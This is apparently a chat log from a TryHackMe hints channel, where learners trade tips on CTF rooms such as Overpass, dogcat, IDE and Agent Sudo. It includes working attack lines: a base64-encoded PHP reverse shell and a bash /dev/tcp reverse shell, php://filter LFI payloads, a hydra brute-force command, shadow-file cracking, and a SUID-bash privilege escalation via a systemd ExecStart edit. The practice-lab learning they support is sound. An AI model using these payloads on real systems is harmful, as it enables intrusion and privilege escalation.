#room-hints
Nooo... I'm going the route with the text this time to see if anything changes...
Okay, ye then give that a try, otherwise write in here again.
Got it - yay. I was just very confused. Thanks!
Room --> Password Attacks
Task4 Q2 --> "What is the crunch command to generate a list containing THM@! and output to a file named tryhackme.txt?"
This is so frustrating. I must be losing my dang mind. I know for a fact that I have the right answer. I even tested it and it worked....It's still saying my answer is incorrect. smh
can anyone help? please? I must be messing up the next 2 digits after "THM"
feel free to DM
nvm. just got it...... phew.
hello guys, I am working on cc: pen testing [section 2] gobuster and no matter what I try I cannot get gobuster to work. I have tried to bring up the man / --help page but neither command works. I am working on the kali attack box
Send your full command
i tried man gobuster and gobuster --help and neither work.
If you are talking about the web based attack machines provided by thm, you rather want to use the attackbox than the kali linux machine.
Ye, I believe the kali linux machine is not maintained/updated anymore, so therefore going with the attackbox is recommended.
ahh better already i appreciate the help you guys rock!
Hey all! - while waiting for AoC3 daily I'm doing AoC2 for the fun of it. I'm doing Day2 which includes a php reverse-shell but it doesn't connect back to my "nc" when I try to open the file I uploaded (I uploaded the revshell as a .png file) - any tips are appreciated
nevermind! - i got it!
hey guys and dolls, I'm having issues with the 'upload vulns' room
meaning ..after I make the changes to the hosts with the echo..I can't access the various URLs..java.uploadvulns.thm , etc
I'm literally cutting and pasting the directions..as well as tried restoring it, then trying again.
Show the output of cat /etc/hosts pls
127.0.0.1 localhost
127.0.1.1 kali
The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.93.14 overwrite.uploadvulns.thm shell.uploadvulns.thm java.uploadvulns.thm annex.uploadvulns.thm magic.uploadvulns.thm jewel.uploadvulns.thm
Are you able to open 10.10.10.10 in your machines browser?
Can I try to access that target machine?
i actually went back to this challenge because it didn't work...then i got it working last week..now it won't work again
10.10.93.143
i realize that hosts was missing 143..i changed it and it still won't work
Could you answer my last question ?
you want to access the machine?
Yes, your target machine, to see if it's working for me.
Okay, seems to work fine for me.
What's the url you enter in your browser bar and what's the reply to it?
Well, sometimes give the target machine a couple of minutes to fully boot and obviously make sure to have no typo in the IP
Common format for CVE's is CVE-####-#### ?
I want to make sure i'm submitting the wrong CVE to the question vs. the wrong format.
Yep, more searching on google has confirmed...
Hi all. I'm going through https://tryhackme.com/room/blue, but I'm confused with the first question. I'm looking for the vulnerability, but the list of MS-xxx exploits is suuuuper long, and doesn't have a reasonable search. I'm thinking I'm missing something obvious.
Can somebody give me a hint?
The question I mean is "What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)"
The way I see it, is I have the list of ports, and that's the information I should use to find the right MS vuln. But on the other hand, there are probably way too many of those.
You could run the nmap scan on the open ports you found with -sC -sV which might be able to suggest some vulns to you.
Yes
(I just started THM. Did the advent, and the pre-security path.)
Do the nmap room and the metasploit room before doing Blue
Gotcha, will do that.
I'd suggest the Complete Beginner Path next :)
Well beside that I don't think you need nmap anymore after that question, but for sure a good thing to check out nmap if you're unfamiliar with it.
I skipped that because I'm not an absolute beginner in terms of computers/programming. Maybe I shouldn't have.
Thanks all! Loving it so far
Don't assume ;)
"Assumption is the mother of all fuckups" and all that
Pre-security is an introduction to basic concepts needed before beginning to learn about cyber security
The Complete Beginner path is the one that starts going through security stuff
thanks, I will give that a shot.
Tbh the names confused me at the start but I started with the Complete Beginner one since I didn't want to miss anything out
Hi. In the burp suite room task 10 question 2 it asks me to look for a response with the 'set cookie' header
I'm having a really hard time finding it
I feel like the part that's confusing me is that I have multiple /socket.io and all of them have the set Cookie header
Would sending any one of them work?
I went ahead and used every one until one of them gave me a graph
I'd still like a hint though
Hello:) I am doing further nmap room, ran into issue. Nmap -sx is telling host is down when it should show 999 open/filtered ports
try pinging the host first if it is actually up
Ping does not work. However it should be blocked by firewall
Ping works to other hosts
that probably means you can't access the host
Nmap task 14
if you are confident that the host is up, use -Pn
I'm not confident host is up. It should be up though, I have terminated the instance and deploying a new one.
maybe you are not properly connected to the vpn
Already regenerated and redownloaded config file
And connected with openvpn. Looks fine on that front
What else can I do if host is not up?
can you show the command you run and the complete output?
!docs verify
-pn shows host is up!
but can't get -sx to work
even though it should to get the right answer for the task
Isn't that a different IP?
I'm dumb
thank you
lol
it's the IP from the old instance
oh no this is interesting
the IP from the old instance started working
I guess I didn't wait long enough for the machine to deploy.... even though I waited over 15 min
Could be. What are you trying to solve here?
Try adding -Pn to your second command.
I did that in the previous command. it worked.
host is up when i use -pn
but host is down when i use -sx
Add, not instead.
oh i see
-Pn and -sWHATEVER are doing different things.
so is nmap always going to tell me host is up with -Pn even when it's not?
@signal sapphire Oh, and please ping or reply if you expect a response in a conversation. Not everyone is following every day every minute every channel
@signal sapphire No. -Pn is not a liar, man. Do you know what -Pn does?
treats all hosts as up
Not exactly accurate. Just google it.
Will do. Thanks for the assistance
Gave +1 Rep to @versed shadow
Hi! I'm having an issue with the cyborg room, when trying to run the script (that is allowed to be run as sudo) the ssh connection just crashes
Any idea ?
Never mind, I got it to work spawning a reverse shell within the ssh connection --'
Edit: Solved (I was dumb and confused two windows I had open. The command works just fine, I just am too tired I guess)
Room: Game Zone (https://tryhackme.com/room/gamezone)
Task: 5 (Exposing services with reverse SSH tunnels)
I am trying to create an SSH tunnel so that my local port 10000 maps to the remote localhost:10000. I am using the following command:
ssh -L 10000:localhost:10000 agent47@<ip here>
This is logging me in to that machine (after providing the password), but it does not seem to forward the port correctly. Any hints?
(<ip here> is of course replaced with the actual IP)
command output for reference
hey, guys! I am currently doing the "Lazy Admin" room. Found the backup file, but not sure how I could find the login page. Tried looking at the documentation but didn't really find it. Could you give me a nudge in the right direction, please?
nvm, gobuster is da man!
Hey, I'm doing Linux fundamentals 1 right now, the question is "Which directory contains a file? " There are a lot of directories which have files, so how can I know which one is the right answer?
what directory are you in rn
/root
remember that cd is to go into one and cd .. is to go out
cd home
cd user or whatever the name is
then do all the stuff
idk
so what's your problem on a more descriptive scale?
But all of them were wrong answers
send me a screen shot of your terminal
Uf..
look in /home/tryhackme/
and make sure you cd into each directory @hushed karma
there should be 4 "folders"
are you on the linux machine or the parrot os attack box?
I just started the machine which they wanted me to start
But yes it looks more like Parrot
on the bottom area where you can add time to the parrot os and such, is there a linux fundamentals tab
click the linuxfunde------ on the bottom of the right
should look like this
np
did anyone solve log4j room
Hey there, I need some hint for the log4j room ...
I barely know it will be some stupid thing but I don't find the "field" name in the log ...
room: https://tryhackme.com/room/ohsint
where do I search for password?
do you still need a hint?
I'm assuming you've done the question before this one?
did you try googling the email?
Yup! I will not spoil but I could say it's about cores
correct, both of these answers are on the same line inside the log file.
Ok !
I was totally dumb x)
That's done now
Thanks for helping your dumb colleague lad
haha
I'm done with https://tryhackme.com/room/networkservices, but I missed a single question, and don't know what I'm supposed to answer.
They ask me what the variant of the ftp server is, and I tried both possible answers, but none of them are correct? :/
You should be able to get that answer with an nmap version scan
Argh, I should have known that. Thanks!
Congratulations
You've completed the room!
@gusty silo if you do whoami and it prints root that is because you are root
I can't figure out what's wrong, someone said to check the parameters and I'm still lost. sorry I'm really new
it's the same exact command other than the ip as the tutorial video
lol type curl --help all and tell me what -x flag is
Please can I get some assistance
linux is case sensitive.... windows is not...
ask your question and your chance of getting help increases 10x
I'm doing agentsudoctf. It wants to know the CVE for the privesc.
I already have escalated privileges with ||an lxd container, https://www.exploit-db.com/exploits/46978|| however it doesn't list a CVE. I tried looking for other exploits, but I couldn't find anything.
then you found another exploit than the intended one... the intended exploit exploits the sudo binary
mhh
you asked in hints so you only get hint and not the full answer
I'll be looking. searchsploit doesn't find anything for the specific version. les suggested the heap buffer overflow. that's not it either, but I'm gonna try it anyway :3
nope it is not a buffer overflow
it is something you can detect by the sudo -l command
Did you try to search for it on exploit-db for example?
searchsploit is exploit-db
only local. and faster, because no browser
gonna have another go. at it :/
Ah alright.
searching exploit-db for sudo gives quite a few results and one that is relevant but yeah it's nice to have searchsploit available
||(ALL, !root) /bin/bash|| doesn't seem all that useful. the user isn't in any group that other accounts are not in. and the only one in the sudo group.
it means I can run it as any user but root?
yay you found it.... good job falco
thank you. i hated it
so this means if you run it with the correct invalid user it gets run as root
I only found it because I googled the line from sudo -l
yeah that is one good way to find it
no it isn't
I only googled that because you told me it has to do with sudo -l's output
oh haha
I saw it and thought: k, no sudo bash then.
well now you are most likely not forgetting this priv esc vector
I found 2 others xD
yeah which is impressive and a nice good job for you
I think the sudo heap buffer overflow broke most rooms to be honest
it's very recent
anyhow, thanks
dinner time!
enjoy your dinner
@deft siren that's how I found it, just googled that (ALL !root) thing and found the exploit code
usually the 1st thing I do on a box is sudo -l, saw that !root and googled what that was and what it meant and that led me to the CVE
@deft siren and unless you manually update your searchsploit (with -u) then it might not be as current as exploit-db.
here is the exploit in question on exploit-db: ||https://www.exploit-db.com/exploits/47502||
I update searchsploit every time before I do a ctf
hello can I have some help with investigating windows. trying to find what IP addr Windows Server connects to when it first boots up?
have tried filtering a few logs by event ID. can't seem to find the right one
Does anyone use Burp Suite here
I prefer ZAP. no limitations and open source. it does mostly the same thing, too.
Most of the people do
The pro version?
@gusty hornet Can I DM you? about Rocket room.
@rustic vigil sure
Of particular interest - we notice the container containers a tool called envconsul that is pulled from Github
is that even english?
adventofcyber3
hi all, I'm in Overpass 2 - Hacked and asking for some help on the question, "What's the hardcoded salt for the backdoor?" under Task 2. I have the code pulled up in github, and see the function calling the salt, verifypass and hashpass, but don't see the value for salt. Can someone point me in the right direction.
what's the github repo url?
func verifyPass(hash, salt, password string) bool is defined in line 55
find out what calls this function and the arguments for it
the second argument is the salt~
@fleet swan search that page for where the verifyPass function is being called
hint: ||ctrl + f||
then just look at what arguments the function is using and compare that to the function definition to see which one is the salt
the salt is not starting with foxesareawesome. this program is trash.
amen brother
Got another one for you
The last question in that room/task says, "Crack the hash using rockyou and a cracking tool of your choice. What's the password?"
Which hash, the default or the one used? I'll try both, but to save time figured I'd ask.
running hydra on a login that redirects on failure, is this correct syntax?
ydra -l jack -P /usr/share/seclists/Passwords/rockyou.txt 10.10.3.144 -s 8888 http-form-post "/login/:user=jack&pass=^PASS^:Invalid" -V
no dice, intruder finds it in like 10 seconds
found this S=Location: /redirect location but hydra falls over on the : after Location
It's probably your condition that's failing you
@umbral umbra the :Invalid part?
I tried Error: Invalid username or password I think was the text...that fails on the : after Error
90% of the time, when hydra is failing for me, but another tool works, it's the pattern I'm using
tried looking for success message, fail message, wasted some 2 hours trying to figure out how to get it to look at the redirect page since success redirects to /logged and failure redirects to /error but couldn't gain any traction
I mean the challenge specifies using burp, I just wanted to do the same thing in hydra
meh, gave up on it and continued the room
found a couple sites that had like hydra -l blah -p blah 10.10.10.10 http-post-form "/login:user=blah&pass=^PASS^:S=Location: /logged" or F=Location: /error but I couldn't get that to work at all
Maybe you already fixed that, but in case you didn't, I think it's not http-form-post rather than http-post-form
@left thunder yarb my typing from memory isn't so good
Any hint where the ZIP is stored? I managed to proceed and got the user flag without cracking it, therefore I am not sure about this file.
https://tryhackme.com/room/agentsudoctf
Try a different tool to locate hidden stuff.
I saw the hint about John. But my only exploit is the FTP server for that user and I can't even locate the file to crack it. Seems a bit strange because I answered the upcoming tasks and got the user flag without it... Am I off???
So did you try any tools to locate hidden stuff somewhere ?
Specifically, hidden stuff in files
I cracked the image and got the password from it.
I don't remember everything in detail of that room, but which tools you used on that image?
steghide and stegseek @left thunder
And you used that on the other images as well?
the other image is a png and stegseek only works with jpg @left thunder
Ah okay, ye well then I can just come back to the first hint, try a different tool on these other images to find hidden files.
So I found out with 7z that there is indeed a file hidden in the png file and I ran John on it with rockyou.txt - but it isn't cracking it. Haven't really used John before, might be doing something wrong now.
You have to extract the file first.
When I tried to run 7z x cutie.png it asked me for a password!? I am not clear what you mean by extract
Using a certain tool to extract the file that's in the cutie.png. Maybe that helps you: https://ctfs.github.io/resources/topics/steganography/file-in-image/README.html
Figured it out. Room done :) Thanks!
Gave +1 Rep to @left thunder
Room Overpass - asking for a hint on how to move on from /admin
Empty-handed. A hint that it's an OWASP10. What I've learned till now is only if I can create a user, then I can somehow play with the cookie.
I don't think there's username creation as a feature, is there?
No, there isn't.
That's why I don't know which direction to take...
The source-code shows that the creds are being processed by a login.js - not more than that...
Not really. There is also a cookie.js
They'll be processed on the server. Login.js is just the javascript that does the client side parts of that.
I think I am not ready for this box. Simple. I don't know what to do with these .js files. Can you perhaps tell me where and what to look up to learn more?
I don't know what to do with these .js files. Read the login one
Think what could go wrong with the authentication
It's set up that if the cookie === Invalid, then you can't log in. If else, you can. I think it should be the opposite. If cookie === valid, login, anything else, not.
Try things then. Test your theories.
See what happens, and learn from it
Thanks, for now. @stuck fractal
Gave +1 Rep to @stuck fractal
Question on Overpass2, task2, question "Crack the hash using rockyou and a cracking tool of your choice. What's the password?" I was able to get the PW cracked with hashcat on Windows, but, is it possible to run hashcat in Kali VM? I get an illegal instruction error.
I've done some research, but no luck, thought someone may have fixed this before.
DO NOT use --force
--force leads to false positives and false negatives
Also, wondering why I can't get it cracked using john.
Run hashcat on your host or swap to John the Ripper
I have a different hash format down
for the salt and pass or the alg altogether?
Oh, man. I got in. Just had to create a cookie. Btw, I did it in DevTools in Firefox.
There's something weird with dynamic formats in JTR
try --format='dynamic=sha512($p.$s)'
I read some of the walkthroughs seeing if anyone got it in john and seems like they all used hashcat. I was hoping to get it done in john for the extra bit of knowledge.
I updated my message
I read some stuff last night using this same format and tried some of those formats as well, but was getting similar messages.
Swap back to a dollar?
Some of the writeups use JTR, and John Hammond got it working after talking to me a bit but I've lost that conversation
Please don't spoil the password though
Thanks for the help and the link too!
Seems like hashcat likes the : and john, depending on the format can use either.
For the future, set up hashcat on your host. Super easy on Windows or Linux.
If you have a GPU, it will be a million times faster
Thanks, yea I ran it on hashcat this morning and it took 3 seconds with rockyou! That was after updating the CUDA package, I ran it last night on CLI and it took 1.5 hours!
Gave +1 Rep to @stuck fractal
Room Overpass
Asking for help on how to run ssh2john
Solved. Downloaded .py from Github.
i need help with dogcat
I figured that you can pass something into the view query string parameter and that it's filtered for the string "cat" or "dog". and that the user input is then passed to include with .php appended to it.
given that I tried a reverse shell php script in base64 that can end in .php and starts with cat. but data:// is disabled.
php:// is allowed but I can't think of anything that contains cat or dog and ends with php that could be useful.
what shall I do?
what error does it throw when you try to get anything except cat or dog?
what do you mean except a cat or dog?
when I try something that doesn't contain cat or dog it just spits out a string "only cats or dogs allowed"
otherwise it will give php errors about include not finding files or wrappers being disabled or malformed
try to keep the word dog or cat in the string while performing the lfi
yes
I tried this base64 string
cataCjw/cGhwIGV4ZWMoIi9iaW4vYmFzaCAtYyAnYmFzaCAtaSA+L2Rldi90Y3AvMTAuOS45Ljc2LzQ0NDQgMD4mMSciKTsgPz4.php
but data:// is not allowed
so i can't execute that
well in that case , keep the word dog or cat in the string and traverse back to try accessing local files
well the issue with that is
there aren't many useful files with the filename containing cat and ending in .php
something like ?randomparam=dog../../index
wait shit... you're right
there is a cats directory...
I could cats/../../../../etc/passwd
exactly
but then again, passwd isn't passwd.php
but i could dump the source code for the page with the php:// wrapper at least
if it were in .php the browser would execute the file and no results will be displayed
you can try that
i tried
10.10.135.187/?view=php://filter/read=convert.base64-encode/resource=cats/../index.php
and got
Warning: include(php://filter/read=convert.base64-encode/resource=cats/../index.php.php): failed to open stream: operation failed in /var/www/html/index.php on line 24
Warning: include(): Failed opening 'php://filter/read=convert.base64-encode/resource=cats/../index.php.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/html/index.php on line 24
what did I do wrong?
see the response, it added an extra .php
right... silly me :/
request with only index
I already discussed that xD
xd
brain is mush by now
:))
that worked. now I can read arbitrary files as www-data. I guess.
Yeah
Room: Overpass (1)
To get root, have edited /etc/hosts to my tun0 IP and launched an http.server and added a file in the corresponding directory with a nc reverse shell. Unfortunately, not getting any response. Can someone kindly help troubleshoot this?
hrm...looking at the files I have for that room. did you find anything called buildscript.sh?
oh man I should have saved the password for james key lol need to crack it again
I resolve to take better notes starting today
thanks to you I ran pspy64 and found a cron job curling from overpass.thm/downloads/src/buildscript.sh and bashing it. So I changed the /etc/hosts file so overpass.thm should point to my tun0 IP. Launched a python server on my end and created the directories and created a file called buildscript.sh with a reverse shell bash script in it. Set up nc but no response.
Gave +1 Rep to @forest robin
I used a bash reverse shell
Should I DM you the passwd?
naw, good practice for me
and you are hosting the buildscript.sh in like downloads/src/
that got me for a while, I didn't have the file in the correct path
yes, and the python server is running on the dir under /download
/downloads
or above, better said
hrm...I did this, created a www folder, then in that folder I have download/src/whatever
and hosted from www
has to be called www?!
#chmod -R 777 /root/
bash -i >& /dev/tcp/10.20.30.40/4444 0>&1
obviously change the ip and port
Can you explain to me the first line?
that chmod? junk, I was testing ALOT of stuff, just forgot to remove that
I was trying the easy solution lol, since the buildscript was running as root with that cron, I figured I would just make /root world readable and just go grab the flag, didn't work
@forest robin I am not really getting every part of the bash shell syntax for now... trying it out anyways
match command-line arguments to their help text
that site will do its best to break down the command and tell you what each part is doing
@white salmon in /etc/hosts did you add your ip, or did you replace what was already there?
cron is doing curl against a domain name, make sure in /etc/hosts that domain name is referencing your ip
and just to make sure maybe from the user try running that same curl command to see if you get a shell
I replaced. I added the port of the python server - right? Like overpass.thm <tab> 10.20.30.40:8888
oh...I did sudo python3 -m http.server so it ran on 80
not sure /etc/hosts can handle ports
and that's backwards, I think it should be ip <tab> domain
no worries, yeah try just the ip and do sudo so it runs on 80, then just to make sure it's all working run that curl command as james and make sure you get a shell, no point waiting around for that cron if you got a typo somewhere
it runs by default on 8000.
with sudo it should run on 80
tried forcing it to run on 80 and says address already in use
you can specify port like sudo python -m http.server 80
sudo ss -tlnp
and check what's listening on 80
a bunch of httpd
httpd sounds like apache, you got a web server running?
in that case you don't need python http.server
just go to the /var/www/html or whatever your document root is...or just kill apache
systemctl stop httpd should do it (systemctl disable httpd so it doesn't start automagically)
Gave +1 Rep to @forest robin
awesome!
So I guess I just learned that /etc/hosts can handle ports...
The second room today without a walkthrough... getting somewhere there.
on a roll, keep it going!
took me a long time just to install all the steganography tools today. and then john wasn't running. a lot of technical problems today.
no kali vm?
ehm, no. Arch VM.
the last 2 days of AoC challenge involved aws and docker. I used the attackbox for those only because I didn't want to spend time installing and most likely troubleshooting stuff
there is the blackarch repo you can add to arch, blackarch being the arch version of kali basically
dunno if that would help you? https://blackarch.org/
BlackArch Linux is a lightweight expansion to Arch Linux for penetration testers.
arch eh? elite
I've heard about it. On the other hand I enjoy trouble shooting the technical stuff
No, just very light on my laptop. My host OS is Arch, so I am used to it more than other distros
gotcha
@forest robin have you done overpass2?
not yet
was gifted a sub a few days ago and been focusing on finishing up these paths since I can do them now
can you crack shadow withOUT passwd?
about to start this: https://tryhackme.com/room/uploadvulns
hrm...afaik you have to unshadow the shadow file to make it crackable in john or hashcat, and you need info from both /etc/shadow and /etc/passwd to do it
like copy the root line from /etc/shadow into shadow.txt and copy the root line from /etc/passwd into passwd.txt
then unshadow shadow.txt passwd.txt > unshadow.txt
then crack unshadow.txt
afaik I could be totally wrong
hm. thought so, too. a weird task, so. missing something again, ough
so I've cracked the hash in shadow with John without the passwd file. Don't really get it. Why do you need to unshadow it?!
oh really? idk I did a room the other day where I had to unshadow it, thought you had to always
ok. waiting for you to do overpass2 :)
lol, was hoping you would finish it then help me out
has some cool wireshark stuff to it, also :)
ahh nice, yeah doing this file uploads vuln room atm
me finishing a room? it's gonna take me ages... googling around every single thing
then will probably do the last 2 parts to this web fundamentals path before going back to random ctf rooms
@white salmon keep poking and googling
Hello, everyone! I am currently working on the Mr Robot room (which is so damn awesome!), and after getting the first key, I am not sure how to proceed. I'd appreciate a nudge in the right direction
enumerate more
Room: IDE
Can someone give me a hint on how to get a foothold on port ||62337||? Have tried ||CVE-2019-19208|| but can't get a shell with the .py-script.
@shy pagoda did you gobuster?
@white salmon just starting this, you did find the stuff in the ftp right?
@white salmon trying to get one of these exploits to work has been a battle, haven't rooted it yet but I can point you towards the wall I'm stuck at
wazzup THM?
I am a noob on Walk an Application. I am on Lesson 3, where you need to view the source code with the web page provided. I think the link they provide is out of date. The comments show that it's being redesigned.
help a brutha out?
I ran through it and it works perfectly, be more specific
remember ur viewing the source for both the framework on the html dir
damn, looks like I exceeded my 1 hr/day limit on my sandbox. double damn.
I didn't realize you need to sub.
I will have to try tomorrow. @quaint prawn thx for the assist. I'll try tomorrow.
Gave +1 Rep to @quaint prawn
Np
redteamrecon
having issues adding a key for censys_email_address
[!] 'censysio_id' key not set. censysio module will likely fail at runtime. See 'keys add'.
[recon-ng][thmredteam.com] > keys add
Adds/Updates a third party resource credential
Usage: keys add <name> <value>
[recon-ng][thmredteam.com] > keys add this 1
[*] Key 'this' added.
lol
I'm sure there's more to it but don't yet know what
Frankly, missed it the first time. Once I got stuck I went back to it and found it. Used BS Intruder with a common passwords list to get to the password.
I am still trying to get one of the exploits to run. All I get are error messages from Python
: ) Got the shell after several attempts.
||CVE 2018-14009 ||worked for me
hi, can I get advice on CC: Pentesting room? doing section 6 smbmap and I am not sure how to finish last question in task 20. It kinda doesn't even fit? any tips please
well found the answer here
@plucky thunder you basically just gotta combine a few flags and form the command
I know but I didn't use "" so it didn't match =]
haha
What is the CVE for the 2020 Cross-Site Scripting (XSS) vulnerability found in WPForms?
I used searchsploit, got the cve number but it still didn't work
any idea?
@forest robin rooted IDE? My reverse shell as root keeps falling once connected
yes, thank you! I got a little further now, shame I actually had to watch hackersploit do some parts. But hey, I've learned new stuff. I am saying shame I had to watch hackersploit in the sense "shame I couldn't get this far on my own"
Gave +1 Rep to @forest robin
Room IDE:
I got user.txt - Am I on the right path with manipulating the ||vsftpd.service|| file???
@white salmon yes you are, I only got the ftp right away because that folder stood out and I was like "what the? where does this go?"
for the Mr Robot room, key3/root privesc....any hints?
is "Dirty cow" the right path also?
Search for SUID binaries, one will be very interesting to exploit
the hint will tell you which if you don't see it
@shy pagoda ( I've disabled the ping so in case you didn't see )
I tried changing the ExecStart line of it to run a bash shell.
thank you, not sure what you mean about disabling the ping tho
Gave +1 Rep to @prisma glade
@white salmon ||I changed that ExecStart to chmod +s /bin/bash||
@white salmon ||to make bash suid, then after restarting the service, I ran /bin/bash -p||
Let me try this soon. Did you try to exploit SUDO?
||and chmod needs full path so it should be like ExecStart=/bin/chmod +s /bin/bash||
sudo itself? no, only this sudo restart service thing
you know why right?
there are some CVEs about that SUDO version
ahh right like baron samedit i think?
and nevermind on the why thing, i was thinking of a different room that used $PATH as an exploit
I don't remember the name. It's not that -1 thing. Something else, I got a headache googling around so much today
getting the exploit to work was my hardest problem, tried all 4 of the RCE ones they listed, even that .txt one that just says to navigate to some folder and right click upload, wasted like 30 minutes trying to find that folder
i know there is a sudo vuln involving sudoedit that is actually somewhat new so most of these THM boxes are vulnerable to it
I am not sure yet what he is talking about. I could not get further than /image if I remember right. I used the one with the 2 nc
yeah same
that one i smashed my face for a while until i realized the port and id were MY port and id lol
like why am i putting the target http url AND putting the target ip and port...smh
Haha. Same here! And then it doesn't always work. For any reason...
that /image clue had me running around on nothing lol, still not sure if that was a red herring or an actual clue? i grabbed all the images on the site, and tried to run stegcracker on them, i had got the shell before the 1st stegcracker was finished
not the /image clue, but the "take care of the image file"
i thought something was steganography in an image...
🤦 I was busy with SUDO most of the time. And I did not get far. And I still want to try to get it done with SUDO
i was gonna try that if i couldnt get the service thing to work
but hard-headedness made me keep trying on the service thing till that worked
did you get that error "must be run from terminal"?
was wondering about that for a while
then i read about cidiad, wanted to understand why the other exploits didn't work. lol didn't get very far with that
what's causing this error?
no? did you upgrade your shell with that whole python import pty, stty raw, echo stuff?
yes, that solved it. pty.spawn. But what's the error? Still trying to understand this
netcat is not a terminal so many commands won't work correctly, like if you do man <anything> in a netcat session it won't work, terminals have more features than just a bare netcat session
there is a room that explains better than i am
thats a good one
so you are a sudo master now huh
i guess think of it like this: netcat is like us holding some thread and a tin can to communicate, we can do so, but its not very robust, if we use a telephone we can communicate more effectively and a cell phone even more so
netcat is like the thread, upgrading the shell is like the phone line, then socat would be like using your cell phone (which you can use to transmit more than just voice)
Something was also confusing me: if you have write permission on a file, why can't you delete it?
Couldn't replace the service file.
Just cat > to it
i think its because the user didnt have write permission on the folder?
interesting that to erase a file you need permission on a folder. I am still trying to grasp all this.
well to erase a file you are writing to the disk
to release the file handlers or whatever
i think?
initially, I hadn't noticed the hint. Now I was pretty sure that I am on the right path, spoiler alert: I was going for pt_chown lol, but the hint showed me once more how wrong I am :D. I am currently working on it, thank you!
Gave +1 Rep to @prisma glade
and replacing its content? you are not writing to the disk?
@shy pagoda the Mr. Robot room? did you play around in that 'shell'
@forest robin you are also changing its size?!?!
so I wgetted it and cat > on the original one...
@white salmon yeah, so the folder write permission controls if you can write / delete files inside it, the specific write permission just decides if you can write
is that correct lol?
Man, this is so fascinating. I really like this room.
didn't know about that :)
Not sure what you mean by this, man
i just used nano on the file (lol actually kept notes on this room)
very basic notes though, just want commands i ran
@shy pagoda when you go to the web server for that room there is a 'shell' you can interact with if i remember
nano? Does this machine have nano? tried my luck with vim and everything was messed up
Hi guys.
I'm doing the "John the Ripper" room at the moment. Does someone know if rar2john isn't in john anymore?
nano is pretty standard
Does the victim machine have nano? I have to try this out. I think I tried before...
Aye this is no big deal, try things until you get the right one
it happens to everyone
oh, I got ya now. I'm past that now
thanks
Gave +1 Rep to @prisma glade
I try to keep notes. Especially all the essential stuff, since not once I pressed CTRL C by mistake and had to redo everything ://
@plucky pecan it's not in /usr/share/john like the ssh2john and others
rar2john appears to just be a command in kali
btw found out that adding & at the end of nc command puts it in the background
type rar2<tab>
that doesnt do anything unfortunately :/
welcome !
oh idk, if you installed it yourself, make sure you installed the jumbo version of john
some distros default to the smaller john and that is missing quite a few things
the attackbox should have it though?
@white salmon yeah my notes are just: got the root flag, ok let's scroll back through all 200 terminal windows and figure out where we started, and which commands yielded results, put those commands in a file in order
mine doesn't it seems. I thought it had jumbo john tho
john -h will tell you which one you have on the 1st line
John the Ripper 1.9.0-jumbo-1+bleeding-aec1328d6c 2021-11-02 10:45:52 +0100 OMP [linux-gnu 64-bit x86_64 AVX512BW AC
i would imagine kali has jumbo john...i installed the kali-linux-everything so my installs may be different
i have : John the Ripper 1.9.0-jumbo-1+bleeding-51f7f3dcd 2020-09-01 13:29:43 +0200 OMP [linux-gnu 64-bit x86_64 AVX2 AC]
so you have john...and typing rar2<tab> didnt complete to rar2john?
which rar2john shows nothing? (should have had you do this one 1st)
when i type "rar2<tab>" nothing happens
when i execute something like "rar2john secure.rar > rar_hash.txt" i get "rar2john: command not found"
ssh2john seems to be missing as well
ssh2john is not a command it is a script located in /usr/share/john
/usr/share/john/ssh2john.py
but rar2john is a command located in /usr/sbin/rar2john
did you try: which rar2john? if that comes up blank you are missing that
yeah it stays blank
I ran that with python ssh2john.py, is that right or do i have to put the location as well?
@plucky pecan so you dont have rar2john installed then, maybe your system is out of date? or...idk. and for ssh2john.py you will need full path
python3 /usr/share/john/ssh2john.py ssh.key > ssh.key_hash
something like that
but shouldn't the attackbox be up to date so you can do the rooms as they are described?
How do i install the correct version then, since apt-get install john didnt get me what i needed (not sure if this installs jumbo john for sure).
@plucky pecan apt search john and do the one that has jumbo in its name? if nothing comes up might have to install from sources?
and attackbox should be up to date as its supposed to be a generic kali machine for people without local kali to use, dunno how often they update the image
Ok i will tinker around a bit with it tomorrow and see if i get it solved. Thanks for your help so far
I'm calling it a day now
@forest robin @white salmon thank you both so much! You have no idea how fun this room was for me
Gave +1 Rep to @forest robin
Gratz
@shy pagoda grats!
@white salmon correct path to chmod?
@white salmon remember paths on the target might be different than paths on your local machine
🤦
||i used /bin/chmod||
whereis revealed the truth... OUGH
whereis? never knew that one before
I am used to having it in /usr/bin
which and locate yeah...handy, thanks @white salmon
Gave +1 Rep to @versed shadow
100% right..
Thanks, mate. Now it's time to skin the cat another way (SUDO)
Gave +1 Rep to @forest robin
@white salmon grats!!
once you learn that sudo method i bet it will be a viable exploit path on most THM boxes
I have a feeling there are a few ways how to skin this cat
Fascinating stuff. Since I started a few days ago not to use walkthroughs anymore I've been spending so much time googling around. Literally hours...
I guess if not for this server I would need the walkthroughs...
@white salmon thats good, basically what im doing. learning 100000 ways NOT to do the box lol, but all that reading and learning is gonna help you in the long run
something you read while doing this box, will help you solve the next one faster
@forest robin what does -p after bash do?
so...take this with a grain of salt lol i could be wrong...but /bin/bash -p runs bash and pulls ENV variables
so the setuid bash will pull the root ENV variables
if you do without -p it just runs bash without pulling ENV
you can confirm this by running the suid bash with and without -p each time doing echo $ENV
redteamrecon
having issues adding a key for censys_email_address
[!] 'censysio_id' key not set. censysio module will likely fail at runtime. See 'keys add'.
[12:30 AM]
[recon-ng][thmredteam.com] > keys add
Adds/Updates a third party resource credential
Usage: keys add <name> <value>
[recon-ng][thmredteam.com] > keys add this 1
[*] Key 'this' added.
[12:30 AM]
lol
[12:30 AM]
I'm sure there's more to it but don't yet know what
Any ideas
printenv maybe? I tried echo $ENV and no output (both shells)
i did say take what i was saying with a grain of salt
sorry if this is off-topic, but too interesting to me :)
it is interesting, also good to understand the mechanics behind it
looking at the man bash page -p is short for --posix
in this mode, interactive shells expand the ENV variable and commands are read and executed from
If the shell is started with the effective user (group) id not equal to the real user (group) id, and the -p option is not supplied, no startup files are read, shell functions are not inherited from the environment, the SHELLOPTS, BASHOPTS, CDPATH, and GLOBIGNORE variables, if they appear in the environment, are ignored, and the effective user id is set to the real user id
little cut off lol
looks like without -p, if the effective group id does not equal the actual group id then the effective group id is reset to the actual group id
if -p is supplied then no reset takes place...and suid sets the effective group id to 0...so without -p, the user's actual group id won't match the suid group id and thus the effective group is reset to the actual one
Yes. And this is the case here. RUID is drac and EUID is root.
Fascinating, again.
